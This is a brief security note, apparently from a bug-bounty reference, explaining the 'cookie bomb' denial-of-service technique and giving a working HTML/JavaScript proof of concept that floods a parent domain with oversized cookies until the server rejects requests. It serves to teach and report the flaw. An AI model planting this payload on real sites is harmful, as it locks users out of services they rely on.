The cookie bomb works by setting large cookies that are way too big making the server decline any request send with them for having a too long request header.
Examples
- From HackerOne
POC
<html>
<head>
</head>
<body>
<script>
var base_domain = document.domain.substr(document.domain.indexOf('.'));
var pollution = Array(4000).join('a');
for(var i=1;i<99;i++){
document.cookie='bomb'+i+'='+pollution+';Domain='+base_domain;
}
</script>
<h1>Cookie Bomb executed! To remove it clear your cookies.</h1>
</body>
</html>